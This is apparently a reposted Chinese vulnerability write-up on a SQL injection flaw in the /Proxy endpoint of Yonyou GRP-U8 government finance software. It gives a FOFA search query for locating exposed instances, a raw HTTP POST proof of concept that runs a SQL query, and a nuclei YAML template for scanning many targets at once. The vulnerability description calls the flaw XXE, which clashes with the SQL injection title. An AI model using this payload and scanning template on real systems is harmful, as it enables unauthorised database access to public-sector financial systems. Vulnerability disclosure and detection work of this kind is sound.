首页 > 数据库 >用友GRP-U8 Proxy SQL注入 CNNVD-201610-923

用友GRP-U8 Proxy SQL注入 CNNVD-201610-923

时间:2023-09-07 15:26:16浏览次数:207  
标签:U8 GRP Accept Content 用友 201610 Proxy

漏洞描述

用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行

影响版本

用友GRP-U8行政事业内控管理软件(新政府会计制度专版)

漏洞复现

fofa语法:title="用友GRP-U8行政事业内控管理软件"
登录页面:

POC:

POST /Proxy HTTP/1.1
Host: 
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

nuclei批量yaml文件

id: yonyou_GRP-U8_Proxy_sqli_rce

info:
  name: yonyou_GRP-U8_Proxy_sqli_rce
  author: mczilong
  severity: critical
  description: title="用友GRP-U8行政事业内控管理软件"
  tags: yonyou,oa

requests:
  - raw:
      - |
        @timeout: 25s
        POST /Proxy HTTP/1.1
        Accept: Accept: */*
        Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
        Content-Length: 357
        Connection: Keep-Alive
        Cache-Control: no-cache

        cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500

      - type: word
        part: body
        words:
          - "<SESSIONID>"
          - "ERROR"

标签:U8,GRP,Accept,Content,用友,201610,Proxy
From: https://www.cnblogs.com/pursue-security/p/17684995.html

相关文章

  • windows vs使用grpc-cpp的坑
    1.通过vcpkg安装protoc和grpc-cpp2.生成proto协议代码:protoc-I..-I.--cpp_out=. test.proto3.生成grpc服务代码:protoc-I..-I.--grpc_out=.--plugin=protoc-gen-grpc=`full_path\grpc_cpp_plugin.exe` test.proto4.创建vs工程,引用生成的代码,引用vcpkg安装的pro......
  • IU86751低空载电流,40倍增益免滤波,2X28W双声道或50W音频放大器
    IU86751E是一款2x28W立体声;在单声道使用的情况下;最高可输出50W高效D类音频功率放大电路。先进的EMI抑制技术使得在输出端口采用廉价的铁氧体磁珠滤波器就可以满足EMC要求。IU86751E音频功率放大器是为需要输出高质量音频功率的系统设计的,它采用表面贴装技术,只需少量的外围器件,便使......
  • RTSP协议视频智能安防监控平台EasyNVR的录像播放及下载接口支持返回在线m3u8格式视频
    随着视频智能安防监控系统的普及,安防监控平台在各行各业的项目中得到了广泛应用。未来,AI智能将成为安防监控的主导方向。为了满足行业需求,TSINGSEE青犀视频不断提升现有产品的适应能力,进一步推动智能安防监控系统的发展。目前,EasyNVR作为TSINGSEE青犀视频开发的稳定可靠的智能安防......
  • 用友致远U8-OA getSessionList jsp信息泄露复现
    1.漏洞描述用友U8-OAgetSessionList.jsp存在漏洞,攻击者通过该漏洞可以获取到所有用户的sessionID,利用获取到的sessionID即可登录到系统。2.网络测绘fofa:"用友U8-OA"3.漏洞复现1.登录页面2.验证POC/yyoa/ext/https/getSessionList.jsp?cmd=getAll3.将其拼......
  • 工作中你会使用到 grpcurl 吗?
    在平时的开发过程中,我们一般是http接口对外,grpc接口对内部微服务相信对于如何去请求http接口,大家都很熟悉了如果是inux里面使用curl命令在windows里面我们可以使用postman来请求接口如果对于一个云上开发的接口的话,我们可能会使用apifox来进行请求那么......
  • GBU816-ASEMI功率整流器件GBU816
    编辑:llGBU816-ASEMI功率整流器件GBU816型号:GBU816品牌:ASEMI芯片个数:4封装:GBU-4恢复时间:>50ns工作温度:-55°C~150°C浪涌电流:200A正向电流:8A反向耐压:1600V正向压降:1.10V引脚数量:4GBU816特性:ASEMI品牌GBU816是采用工艺芯片,该芯片具有良好的稳定性及抗冲击能力,能够持续......
  • GBU814-ASEMI功率整流器件GBU814
    编辑:llGBU814-ASEMI功率整流器件GBU814型号:GBU814品牌:ASEMI封装:GBU-4恢复时间:>50ns正向电流:8A反向耐压:1400V芯片个数:4引脚数量:4类型:整流桥、功率整流器件特性:功率整流器件、高耐压整流桥浪涌电流:200A正向压降:1.10V封装尺寸:如图工作温度:-55°C~150°CGBU814特性超快速切换,实现高效率......
  • gRPC with JWT
    在gRPC中使用JWT(JSONWebTokens)进行身份验证是一种常见的做法,它可以帮助你确保请求方的身份和权限。下面是一种使用gRPC和JWT进行身份验证的步骤:生成和签发JWT:在用户登录成功后,你需要生成一个JWT并将其签发给用户。JWT中可以包含一些有关用户身份、角色、权限等的......
  • GBU812-ASEMI逆变器专用整流桥GBU812
    编辑:llGBU812-ASEMI逆变器专用整流桥GBU812型号:GBU812品牌:ASEMI芯片个数:4封装:GBU-4恢复时间:>50ns工作温度:-55°C~150°C浪涌电流:200A正向电流:8A反向耐压:1200V正向压降:1.10V引脚数量:4GBU812特性:ASEMI品牌GBU812是采用工艺芯片,该芯片具有良好的稳定性及抗冲击能力,能够持续保证了GBU812......
  • GBU812-ASEMI逆变器专用整流桥GBU812
    编辑:llGBU812-ASEMI逆变器专用整流桥GBU812型号:GBU812品牌:ASEMI芯片个数:4封装:GBU-4恢复时间:>50ns工作温度:-55°C~150°C浪涌电流:200A正向电流:8A反向耐压:1200V正向压降:1.10V引脚数量:4GBU812特性:ASEMI品牌GBU812是采用工艺芯片,该芯片具有良好的稳定性及抗冲击能力,能够......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99